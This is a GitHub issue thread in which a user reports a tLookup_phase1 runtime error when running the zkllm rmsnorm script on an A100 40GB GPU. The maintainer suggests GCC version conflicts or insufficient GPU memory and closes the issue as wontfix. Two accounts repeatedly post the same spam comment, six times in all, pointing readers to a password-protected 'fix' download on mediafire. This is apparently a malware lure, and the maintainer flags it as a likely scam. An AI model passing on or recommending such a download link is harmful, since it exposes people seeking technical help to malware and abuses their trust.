### ISSUE TITLE
rmsnorm:  'std::runtime_error'   what():  tLookup_phase1: claim != p(0) + p(1)

### ISSUE THREAD

**Issue by hzby** [jvhs0706/zkllm-ccs2024#8] opened 2024-08-27 02:49 UTC
I followed the instructions in the README file and encountered the following error. Is there an issue with the README file's description, or could it be a problem with the code itself?
**python llama-rmsnorm.py $model_size $layer_number input $sequence_length --input_file $input --output_file $attn_input**

**terminate called after throwing an instance of 'std::runtime_error'
  what():  tLookup_phase1: claim != p(0) + p(1)**

 **I used NVIDIA A100 40GB. I have changed my makefile: ARCH := sm_86 ==> sm_80 but it didn't work for me.**

**Comment by jia6214876** [comment] 2024-08-27 02:49
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment] 2024-08-27 02:49
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment] 2024-08-27 02:51
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment] 2024-08-27 02:53
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment] 2024-08-27 02:53
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jvhs0706** [comment] 2024-08-27 03:08
Please note that it is possible that there is no "issue with the README file's description" and no "problem with the code itself" simultaneously. Also, spams (and possibly scams) are not welcome. I reserve the right to ban all other participants of this issue if the repeated messages with a suspicious link continue to appear.

It looks like a CUDA memory problem on your side, and I cannot further resolve it without further information. It could be the interference from the existing CUDA installations (which is deeply rooted in the environmental configurations in your cluster that I can never resolve, although I have tried to suggest using `conda` to isolate everything here), or your code is not utilizing your A100 at all and therefore it generates garbage values in p(0) and p(1) returned to CPU. FYI, this demo version (different from the pre-refinement version for experimental figures) was tested on 48GB A6000s.

**Comment by jvhs0706** [comment] 2024-08-27 03:28
BTW, are you sure it's `ARCH := sm_80` instead of `ARCH := sm_86 ==> sm_80` in your `Makefile`?

**Comment by hzby** [comment] 2024-08-27 03:30
> Please note that it is possible that there is no "issue with the README file's description" and no "problem with the code itself" simultaneously. Also, spams (and possibly scams) are not welcome. I reserve the right to ban all other participants of this issue if the repeated messages with a suspicious link continue to appear.
> 
> It looks like a CUDA memory problem on your side, and I cannot further resolve it without further information. It could be the interference from the existing CUDA installations (which is deeply rooted in the environmental configurations in your cluster that I can never resolve, although I have tried to suggest using `conda` to isolate everything here), or your code is not utilizing your A100 at all and therefore it generates garbage values in p(0) and p(1) returned to CPU. FYI, this demo version (different from the pre-refinement version for experimental figures) was tested on 48GB A6000s.

Thank you for your response! I used Conda to set up the environment as described in the README. The error occurred at the following line:

os.system(f'./rmsnorm {args.which} {args.input_file} {args.seq_len} {embed_dim} {workdir} {layer_prefix} {args.output_file}')

I checked that the paths and inputs are correct. However, after recompiling rmsnorm, I received the following warning messages (not sure if they help in identifying the issue)：

Info: no reference to variable mrg32k3aM1Seq
Info: no reference to variable mrg32k3aM2Seq
/opt/rh/devtoolset-8/root/usr/libexec/gcc/x86_64-redhat-linux/8/ld: warning: /home/byzeng/anaconda3/envs/zkllm-env/lib/libstdc++.so: unsupported GNU_PROPERTY_TYPE (5) type: 0xc0010001
/opt/rh/devtoolset-8/root/usr/libexec/gcc/x86_64-redhat-linux/8/ld: warning: /home/byzeng/anaconda3/envs/zkllm-env/lib/libstdc++.so: unsupported GNU_PROPERTY_TYPE (5) type: 0xc0010002

I also tried debugging ./rmsnorm using gdb and got a more detailed error message:

Program received signal SIGSEGV, Segmentation fault.
0x00002aaaabc50f53 in fseek () at fseek.c:35

Since I’m not familiar with CUDA, I’m still unsure about the root cause of the issue and how to resolve it. Any guidance would be greatly appreciated!

**Comment by jia6214876** [comment] 2024-08-27 03:31
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jvhs0706** [comment] 2024-08-27 03:44
@hzby Oh I see, it seems that it has something to do with the `gcc` compiler versions. The `gcc` is not packed in the `conda` environment. `nvcc` may depend on `gcc` and there may be some incompatibilities. However, I am not very familiar with that part either. I have only tested this on servers that I have access to, and they all worked, and I have never seen the `unsupported GNU_PROPERTY_TYPE (5) type: 0xc0010001` error. I do have seen things like `Info: no reference to variable mrg32k3aM2Seq` but they are just fine.

The best I can do, maybe, is to list more environmental configurations (like the `gcc`) that I used before, and pack them in a `conda` environment. But the most subtle differences in environmental configurations may still cause trouble (and let's see how many things I have to pack before I finally help everyone get rid of environmental issues). Here, the `gcc` is not packed in the `conda` environment

Please also confirm if @jia6214876 is unrelated to you, and I will take further actions. We can delete this issue and continue in email if these scammers continue. I have sent you an email.

**Comment by hzby** [comment] 2024-08-27 04:00
Thank you for your prompt response. I look forward to your updates on the environment setup, especially regarding the GCC compiler versions.

By the way, @jia6214876 is not related to me, and I support you in taking further action if needed.

**Comment by jvhs0706** [comment] 2024-08-30 23:56
I have tried multiple clusters, but I have been unable to reproduce the issue. 

Packing `gcc` in `conda` either does not work or mess up the environment with the already pre-installed `gcc`.

I do have heard complaints about being unable to run this on A100-40GBs. What I suspect is that the current version must be run in 48GB+ versions. 

Indeed, the original codebase for the experiments were on a cluster where I usually got assigned to a node with A100-40GBs (but longer have access to due to some internal reasons). However, the current code base was completely rewritten after the paper acceptance. I guess the reason that 40GB is no longer sufficient is because the current version will have python executions invoke CUDA executions, so both the HF models and the CUDA executions for the proofs are occupying the CUDA memory at the same time. This was not the case for the original code base for conducting the experiments, as the python executions and CUDA executions were separated.

I am sorry that I am unable to further investigate the issue, and I cannot rewrite this to simply make it run on A100-40GBs - my time and energy are limited.

**Closed by jvhs0706** 2024-08-30 23:56 UTC
Labels: wontfix
